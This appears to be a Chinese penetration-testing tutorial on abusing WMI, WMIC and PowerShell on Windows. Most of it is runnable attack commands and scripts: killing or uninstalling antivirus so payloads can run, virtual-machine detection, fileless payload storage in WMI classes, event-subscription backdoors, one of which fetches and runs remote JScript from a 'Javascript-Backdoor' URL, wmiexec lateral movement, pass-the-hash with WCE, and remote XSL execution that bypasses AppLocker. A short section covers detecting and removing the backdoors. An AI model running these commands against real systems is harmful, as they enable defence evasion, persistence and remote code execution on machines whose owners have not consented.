WMI
WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI在渗透测试中的价值在于它不需要下载和安装, 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生,不会留下任何痕迹。
检索系统信息
检索系统已安装的软件
1
| wmic product list brief |more
|
data:image/s3,"s3://crabby-images/d0a20/d0a204e34202c5d15a56fd4f5e26ba23fd4304d0" alt="wmic_1"
搜索系统运行服务
1
| wmic service list brief |more
|
data:image/s3,"s3://crabby-images/f71d6/f71d6c65a9dfbfbeab9ea9404af956ff9a3faf90" alt="wmic_1"
搜索运行中的程序
1
| wmic process list brief |more
|
data:image/s3,"s3://crabby-images/8c75a/8c75af1fda6600c1b793d830e382753baf38154b" alt="wmic_3"
搜索启动程序
1
| wmic startup list brief |more
|
data:image/s3,"s3://crabby-images/3fbf7/3fbf7cb5c96fa0344c8db9ac304534db1f859519" alt="wmic_4"
搜索共享驱动盘
1
| wmic netuser list brief |more
|
搜索用户名
1
| wmic useraccount list brief |more
|
data:image/s3,"s3://crabby-images/c8005/c80059fde36080170bc314c5996edd81850903bc" alt="wmic_5"
搜索计算机域控制器
1
| wmic ntdomain list brief
|
data:image/s3,"s3://crabby-images/f0b02/f0b0294f29db4a5451803158d264185f9756f13b" alt="wmic_6"
搜索登录用户
1
| wmic logon list brief |more
|
data:image/s3,"s3://crabby-images/03df2/03df2a6a7bf1667e5e4c0f2906f5ac404155b85b" alt="wmic_7"
搜索已安装的安全更新
1
| wmic qfe list brief |more
|
data:image/s3,"s3://crabby-images/8e3b3/8e3b37e5bed8560a1997822905119e652eafd075" alt="wmic_8"
执行任务
WMIC不仅仅只是用于检索系统信息。在渗透测试中, 使用适当的命令,它也可以执行各种有用的任务。
卸载和重新安装程序
在渗透测试中, 我们经常遇到反病毒程序阻止payload运行。 这时候我们可以通过WMIC命令来卸载反病毒程序。
1 2
| wmic product where "name like '%Office%'" get name wmic product where name="Office" call uninstall
|
data:image/s3,"s3://crabby-images/4c674/4c6740f940fd9fad09fff207031fb4d504503b3b" alt="wmic_9"
运行程序管理
上面我们提到卸载反病毒程序来运行payload。 但是有时候我们没有足够的权限去卸载程序。 这时我们可以通过WMIC命令来停止运行反病毒服务。
第一步, 找到反病毒程序
1
| wmic process where "name like '%forti%'" get name
|
- 第二步, 通过WMIC命令来停止运行反病毒服务
1
| wmic process where name="FortiTray.exe" call terminate
|
Powershell
自从PowerShell的出现,WMI功能已经被完全整合到了PowerShell里面。在PowerShell中, WMI拥有多个类型的种类,每个种类都代表一个内部组件:Win32_proces代表当前系统所运行程序。 Win32_Service代表当前系统所运行服务等等。
侦查
操作系统相关信息
1 2 3
| Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS
|
data:image/s3,"s3://crabby-images/7cb43/7cb437a638552c02c47a93f8d079002d7f44763b" alt="wmic_10"
文件/目录列表
1
| Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile
|
磁盘卷列表
1
| Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume
|
data:image/s3,"s3://crabby-images/cb4d3/cb4d3b296de018cb5400bb8617fb658eadda0122" alt="wmic_12"
注册表操作
1 2 3
| Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run Get-ItemProperty OptionalComponents
|
当前进程
1
| Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
|
data:image/s3,"s3://crabby-images/56e64/56e64645f45d25fe29e458e98ea48207795311f5" alt="wmic_14"
列举服务
1
| Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service
|
data:image/s3,"s3://crabby-images/342d1/342d16623e6aa18b9c49fae35204bff584d920ce" alt="wmic_15"
日志
1
| Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent
|
登陆账户
1
| Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser
|
data:image/s3,"s3://crabby-images/342d1/342d16623e6aa18b9c49fae35204bff584d920ce" alt="wmic_15"
共享
1
| Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share
|
data:image/s3,"s3://crabby-images/b7b8f/b7b8f3c4a4ac54fb575b877a3ab13e32b5c4e2b2" alt="wmic_17"
补丁
1
| Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering
|
杀毒软件
1
| Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
|
虚拟机检测
(1)判断TotalPhysicalMemory和NumberOfLogicalProcessors
1 2 3 4 5 6 7 8 9 10 11 12
| $VMDetected = $False $Arguments = @{ Class = 'Win32_ComputerSystem' Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648' } if (Get-WmiObject @Arguments) { $VMDetected = $True "In vm" } else{ "Not in vm" }
|
(2)判断虚拟机进程
1 2 3 4 5 6 7 8 9 10 11 12 13
| $VMwareDetected = $False $VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"' $VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"' $VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"' if ($VMAdapter -or $VMBios -or $VMToolsRunning) { $VMwareDetected = $True "in vm" } else { "not in vm" }
|
存储payload
【管理员权限】
1 2 3 4 5 6
| $StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null) $StaticClass.Name = 'Win32_EvilClass' $StaticClass.Put() $StaticClass.Properties.Add('EvilProperty' , "This is payload") $StaticClass.Put()
|
data:image/s3,"s3://crabby-images/04a04/04a04da35309cee592c415932c24a0c68230f54f" alt="wmic_18"
Tips:
1
| 可加密存储于此位置,执行时解密运行,达到硬盘不存文件的效果
|
隐蔽定时启动程序
【管理员权限】
1 2 3 4 5 6 7 8 9 10
| $filterName = 'BotFilter82' $consumerName = 'BotConsumer23' $exePath = 'C:\Windows\System32\notepad.exe' $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name= $filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath} Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter= $WMIEventFilter;Consumer=$WMIEventConsumer}
|
data:image/s3,"s3://crabby-images/acf46/acf4659ef9a30da76dae81ab23b912dbf1a6057a" alt="wmic_19"
查看进程:
data:image/s3,"s3://crabby-images/3053b/3053b7767a4d54ad6f26b82e003d9c629853864a" alt="1553239184506"
每60s执行一次notepad.exe
远程下载js脚本
通过远程下载js脚本,进行命令调用
1 2 3 4 5 6 7 8
| #!powershell $filterName = 'filtP1' $consumerName = 'consP1' $Command ="GetObject(""script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test"")" $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ScriptingEngine='JScript';ScriptText=$Command} Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
|
data:image/s3,"s3://crabby-images/ccdaf/ccdafcf02c048316e01d3f276c4ebca88f79d09c" alt="wmic_22"
WMI后门检测及清除
查看当前WMI Event
【管理员权限】
1 2 3 4 5 6 7 8
| #List Event Filters Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
|
data:image/s3,"s3://crabby-images/88393/88393f08d238515dea01d730e5cbd833b0b044c1" alt="wmic_21"
清除后门
【管理员权限】
1 2 3 4 5 6 7 8
| #Filter Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
#Consumer Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
#Binding Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%
|
data:image/s3,"s3://crabby-images/acf46/acf4659ef9a30da76dae81ab23b912dbf1a6057a" alt="wmic_19"
wmiexec.vbs
WMIEXEC是用VBS脚本调用WMI来模拟psexec的功能
data:image/s3,"s3://crabby-images/10640/106406791a8ee3d344ec7dba5578a967cfbeccb1" alt="wmic_23"
WMIEXEC支持两种模式,一种是半交互式shell模式,另一种是执行单条命令模式。
WMIEXEC需要提供账号密码进行远程连接,但是如果没有破解出账号密码,也可以配合WCE的hash注入功能一起使用,先进行hash注入,然后再使用WMIEXEC即可。
半交互shell模式
提供账号密码,执行如下命令:
1
| cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password
|
data:image/s3,"s3://crabby-images/dfa56/dfa56922cb07b4dfbfd91ecb2eae117c47a3923a" alt="wmic_24"
这样就获得了一个半交互式的shell,这个shell和psexec的shell没什么区别。之所以称为半交互式,是因为这个shell也不能执行实时交互的命令,和psexec是一样的。
如果有时候我们抓取到的是hash,破解不了时可以利用WCE的hash注入,然后再执行WMIEXEC(不提供账号密码)就可以了。
利用wce抓取hash:
data:image/s3,"s3://crabby-images/76086/76086afa35d2999e2afbe3bf209cd8898db988be" alt="wmic_25"
利用wce进行hash注入:
1
| wce -s Administrator:WIN-2003:F67CE55AC831223DC187B8085FE1D9DF:45A524862326CB9E7D85AF4017A000F0
|
data:image/s3,"s3://crabby-images/23080/230804b2b795df75b989001d89f558ef8ee752a7" alt="wmic_26"
单个命令执行的模式
这个模式适用于只需要执行一个命令,或者说当前的环境不是交互式shell,没法运行WMIEXEC的shell模式时(比如在webshell里面)。
1
| cscript.exe wmiexec.vbs /cmd 192.168.1.1 username password "command"
|
data:image/s3,"s3://crabby-images/a2fbe/a2fbef8926623086c520386fb81838d6beee5a4a" alt="wmic_27"
wmic调用xsl文件
本地:
1
| wmic process list /FORMAT:evil.xsl
|
远程:
1
| wmic os get /FORMAT:"https://example.com/evil.xsl"
|
xsl文件内容如下:
1 2 3 4 5 6 7 8 9 10 11
| <?xml version='1.0'?> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> <output method="text"/> <ms:script implements-prefix="user" language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); ]]> </ms:script> </stylesheet>
|
1
| wmic os get /format:"https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xsl"
|
执行成功,成功弹出计算器,如下图
data:image/s3,"s3://crabby-images/55af5/55af57e7edb0bda5a6d2f9b70e6aa2e0f59717fe" alt="wmic_28"